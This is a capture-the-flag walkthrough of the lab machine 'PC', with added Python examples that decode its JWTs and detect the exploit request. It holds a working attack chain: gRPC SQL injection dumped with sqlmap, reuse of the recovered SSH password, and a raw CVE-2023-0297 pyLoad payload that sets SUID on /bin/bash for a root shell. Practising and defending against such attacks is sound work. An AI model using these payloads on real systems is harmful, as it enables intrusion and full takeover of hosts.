Target IP: 10.129.209.172
Challenge Description: N/A.
Performing a port scan with the command sudo nmap -sS 10.129.209.172 -p- returns the result shown above. There are two TCP ports open on the target machine: SSH and some other application on port 50051. Time to perform an aggressive port scan against these ports to identify their services.
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/PC]
└─$ sudo nmap -sV -A 10.129.209.172 -p 22,50051
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-09 19:09 UTC
Nmap scan report for 10.129.209.172
Host is up (0.023s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
| 256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
|_ 256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
50051/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (97%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 28.17 ms 10.10.14.1
2 27.64 ms 10.129.209.172
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.02 seconds
I performed an aggressive port scan against the two TCP ports using the command sudo nmap -sV -A 10.129.209.172 -p 22,50051 and obtained the result shown above. This odd application on port 50051 is intriguing. I will need to find out what runs on this port.
Port 50051: ?
I did a Google search for the port 50051 application and retrieved the website shown above. By the looks of it, gRPC runs on this port by default. I will need to find tools I can use to interact with the RPC methods on gRPC servers.
One such tool is gRPCurl, as shown above. I found the GitHub project here. I downloaded a copy of the binary executable to my machine. Time to run it.
I made the binary executable. Then, using the command ./grpcurl -plaintext 10.129.209.172:50051 list, I listed all the services exposed by the target server and identified a service called SimpleApp. Using the command ./grpcurl -plaintext 10.129.209.172:50051 describe SimpleApp, I identified all the methods exposed by this service. There are three methods: LoginUser, RegisterUser, and getInfo, as shown above. OK, it seems the target machine really is running gRPC on this port. Although gRPCurl is a good tool, I had trouble invoking the RPC methods with it. Time to find a better tool. One such tool is grpcui, a web-based application.
I found very helpful tips on how to enumerate this port at this website: https://www.huxxit.com/index.php/2023/05/25/notes-on-pentesting-ctf-hacking-a-grpc-application/. Following the steps, I installed grpcui on my machine. I browsed to https://github.com/fullstorydev/grpcui/releases and downloaded the latest version, grpcui_1.4.1_linux_x86_64.tar.gz, then extracted it. The extracted folder contains the binary executable grpcui. Time to test it now :)
I executed the command ./grpcui -plaintext 10.129.209.172:50051 to start the web application. And bingo! Now I can invoke the RPC methods on the target machine's gRPC service directly through this web-based interface, as shown above. I can see the three methods I identified earlier.
I tried to create an account with the credentials test:tester by invoking the RegisterUser method, as shown above.
And bingo! It worked. I wonder what happens if I try to log in as this new user by invoking the LoginUser method. Time to find out.
I changed the method to LoginUser and added the credentials as POST data, as shown above.
It worked. I successfully logged in. I also obtained some sort of token and a user ID, as shown above. This is interesting. There is one more method which I have not checked: getInfo.
I notice this method only takes an ID parameter. I passed in the value 43 and...
It claims the token is missing. Hmmm... Maybe I can capture the POST request in Burp Suite and append the token myself to see the output? I created a new user with the credentials testing:testing. This user has the ID 796 and the token b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdGluZyIsImV4cCI6MTcxNTI5NzAyMn0.1AABAxapZ_7KFBrO3qsrcSxJdntUqbHFy-qOXe9WU7M'. I made a request, but the token parameter was still missing. Time to add it myself.
And bingo! I added the token header myself and, after intercepting the POST request, obtained the result shown above. Right away, I notice the values are stored in JSON format. Can I perform a JSON injection attack?
I relayed the request to the Repeater tool and tested for injection. The first parameter I tested was id, as shown above. I inserted a single quote after the number 796 and got an interesting error message: Unexpected \u003cclass 'TypeError'\u003e: bad argument type for built-in operation. Is this SQL injection?
I created another account and used the getInfo method to obtain the result shown above. The call succeeded and returned the message Will update soon. From the earlier enumeration, I noticed the application was vulnerable to injection attacks. Time to save this request and run sqlmap on it. The ID and token for this user are the following:
id: 549
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiaGVsbG8iLCJleHAiOjE3MTUyOTg1Mjd9.ShcAOtDu03kMEOfuawvp2Ctg82QPmdzpwsxtSwAta-A
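The tokens LoginUser returns are ordinary HS256 JWTs. This Python example is added here and is not from the original writeup; it decodes both tokens above and shows that the signed claims are only user_id and exp: the numeric id that getInfo acts on travels as a separate, unsigned request field, which is why that field can be tampered with even though the token itself cannot be minted without the server's secret (the secret strings used below are placeholders, not the application's).

```python
import base64
import hashlib
import hmac
import json

# The two tokens LoginUser returned in the walkthrough (user IDs 796 and 549).
TOKENS = {
    796: "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdGluZyIsImV4cCI6MTcxNTI5NzAyMn0.1AABAxapZ_7KFBrO3qsrcSxJdntUqbHFy-qOXe9WU7M",
    549: "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiaGVsbG8iLCJleHAiOjE3MTUyOTg1Mjd9.ShcAOtDu03kMEOfuawvp2Ctg82QPmdzpwsxtSwAta-A",
}

def b64url_decode(part):
    """JWT segments are unpadded base64url; restore the padding before decoding."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def inspect_jwt(token):
    """Decode header and claims without verifying: this only reads, it never trusts."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(claims_b64))
    return {"alg": header.get("alg"), "claims": claims,
            "sig_bytes": len(b64url_decode(sig_b64))}  # 32 bytes == HMAC-SHA256 tag

def sign_hs256(claims, secret):
    """Mint an HS256 JWT the way the server must; only the secret holder can do this."""
    header = b64url_encode(b'{"typ":"JWT","alg":"HS256"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    tag = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(tag)}"

def verify_hs256(token, secret):
    """Recompute the tag and compare in constant time; False means not minted with this secret."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    signed = f"{header_b64}.{claims_b64}".encode()
    tag = hmac.new(secret.encode(), signed, hashlib.sha256).digest()
    return hmac.compare_digest(tag, b64url_decode(sig_b64))
```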
I saved the request to a file called req on my machine. Then, using the command sqlmap -r req --dump, I obtained the crucial information shown above. sqlmap successfully dumped the contents of the database tables, including the credentials sau:HereIsYourPassWord1431. The only attack vector left now is SSH. Time to test these credentials against the SSH service on port 22.
And bingo! I successfully managed to SSH into the target machine as the user sau with the password HereIsYourPassWord1431. Now I have a foothold on the target machine as the user sau :)
Running the command netstat -antop shows another application listening on port 8000 of the 127.0.0.1 interface. Since I have SSH credentials for the user sau, I can use SSH tunneling to expose this service so I can access it from my machine.
To set up the SSH tunnel, I opened a new terminal session and used the command ssh -N -L 8444:localhost:8000 sau@10.129.209.172. This forwards port 8444 on my machine to port 8000 on the target machine. Then I browsed to http://127.0.0.1:8444 and reached the PyLoad web application, as shown above. Previously, I identified another set of credentials, admin:admin. Will they work here? I had no luck, even with the default credentials. What version of the application is this?
Using the command pyload --version, I obtained the application version, 0.5.0, as shown above. A Google search shows this version is vulnerable to pre-auth RCE, tracked as CVE-2023-0297.
I found the PoC for this exploit at https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad. The steps are simple, as shown above: I have to send a POST request built from the PoC, inserting my own payload. At first I used a reverse shell payload, but it was not reliable. Therefore I decided instead to set the SUID bit on /bin/bash with the command chmod +s /bin/bash, which gives me a root shell. The raw POST payload is the following:
POST /flash/addcrypted2 HTTP/1.1
Host: 127.0.0.1:8444
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
jk=pyimport%20os;os.system("chmod+%2bs+/bin/bash");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
And bingo. After sending the payload, I executed the command bash -p to spawn a root shell, as shown above. Now I have a root shell on the target machine :) GG.
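From the defender's side, the request above has a recognisable shape: a POST to /flash/addcrypted2 whose jk parameter, which pyLoad expects to hold a JavaScript function, instead contains js2py's pyimport. This Python check is an added example, not from the writeup or the pyLoad project; it runs that rule over constructed sample requests, assuming request lines are available from a reverse proxy or access log in front of pyLoad.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests as (method, path, body). The first body is the
# walkthrough's own PoC payload; the second is a benign Click'N'Load-style
# submission whose jk really is a JavaScript function.
SAMPLES = [
    ("POST", "/flash/addcrypted2",
     'jk=pyimport%20os;os.system("chmod+%2bs+/bin/bash");f=function%20f2(){};'
     "&package=xxx&crypted=AAAA&&passwords=aaaa"),
    ("POST", "/flash/addcrypted2",
     "jk=function%20f(){return%20'abc';}&package=films&crypted=QUJD&passwords="),
    ("GET", "/flash/add?urls=http://example.test/file", ""),
]

# js2py's pyimport is the bridge the CVE abuses; the rest are common follow-ons.
SUSPICIOUS = ("pyimport", "os.system", "subprocess", "chmod", "/bin/")

def check_request(method, path, body):
    """Return a verdict for addcrypted2 POSTs, or None for requests that cannot reach the bug."""
    if method != "POST" or urlsplit(path).path != "/flash/addcrypted2":
        return None
    # parse_qs undoes %20 and '+' encoding, so the words are matched in clear text
    jk = parse_qs(body, keep_blank_values=True).get("jk", [""])[0]
    hits = [w for w in SUSPICIOUS if w in jk]
    return {"jk": jk, "hits": hits, "suspicious": bool(hits)}

def scan(samples):
    """Run every sample through check_request and keep only the suspicious verdicts."""
    verdicts = (check_request(*s) for s in samples)
    return [v for v in verdicts if v and v["suspicious"]]
```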
The two flags are shown above.